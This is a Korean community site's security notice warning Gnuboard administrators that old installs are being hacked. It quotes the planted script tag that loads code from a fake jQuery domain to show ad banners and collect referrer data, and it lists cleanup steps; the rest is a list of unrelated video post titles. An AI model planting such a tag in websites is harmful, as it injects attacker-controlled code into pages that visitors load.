• 회원가입
  • 로그인
  • 구글아이디로 로그인

[news] 오래된 그누보드에 광고 악성코드 심는 해킹주의

2,842  

오래된 그누보드 해킹주의보

 

그누보드 관리자 페이지 > 환경설정 > 기본환경설정 > 추가 메타태그 부분에 아래와 같은 코드가 심어져 있는지 체크.


<script src=https://cdn.jquerygoogle.com/jquery.min.js></script>

 

위 코드는 구글링크를 가장해 (외부스크립트 실행 /사용자 리퍼러 정보 수집)해 사이트에 광고 배너 띄우는 악성코드이니, 발견 즉시 삭제하고 아래 조치를 시행.

  • 그누보드를 최신버전으로 업그레이드
  • 백신으로 PC 검사
  • 최고관리자 패스워드 변경
  • FTP 및 DB 비밀번호 변경
  • FTP 접속해 파일 내려받아, 여러파일 검색 지원되는 유틸(에디트플러스, VSCODE 등)로 'jquerygoogle' 키워드 검사해 해당 코드를 심는 코드가 파일에 있진 않는지 체크.

  

관련글: (231023) https://sir.kr/cm_free/1670736


분류 제목
dance 찐며든사랑 님 벌써 24살인가 1~10월 댄스 모음
ucc 그림으로 지하철에서 작업 걸기
dance 치카 필스 (Chika-Feels) 필름 프레임 댄스
sports 프로 골퍼 김은선 님 멋진 경치 골프 필드샷
girl 윗옷 지퍼가 잘 안 잠기는 누나
dance 로켓펀치 소희 님 CHIQUITA(치키타) [댄스/누나]
dance 추랑 님 댄스 - NewJeans, IVE, HELLOVENUS, SISTAR, TWICE 등 [댄스/누나]
drama 넷플릭스 드라마 「경성크리처」 - 재밌네요. ※ 경성크리쳐
military KF-21 시제 5호기 주인은 (인도네시아/폴란드) 중 누구?
military 전국 하늘에서 발견된 미확인 물체 정체는 고체 추친 미사일 발사체
sports 닭백숙 & 레몬
dance 비비지 은하 매니악 댄스
ucc 여친과 집 데이트 하는데 엄마가 귀가
sports 콘테 감독이 최근 손흥민 홀대하는 진짜 이유
sports 메시, 토트넘 이적하면 챔스 우승 확실
military 중국 고체 추친 미사일 발사 실험에 자극 받아 대한민국도 실험한 듯.
dance 팅팅탕탕 팅팅팅팅 탕탕탕탕 댄스
dance 해변가 미싱유 (Missing you) 댄스/누나
dance 치어리더 이세란 님 ATTENTION 커버댄스 버스킹
ucc 길고양이에게 집사로 간택 당한 처자
120/163
목록
찾아주셔서 감사합니다. Since 2012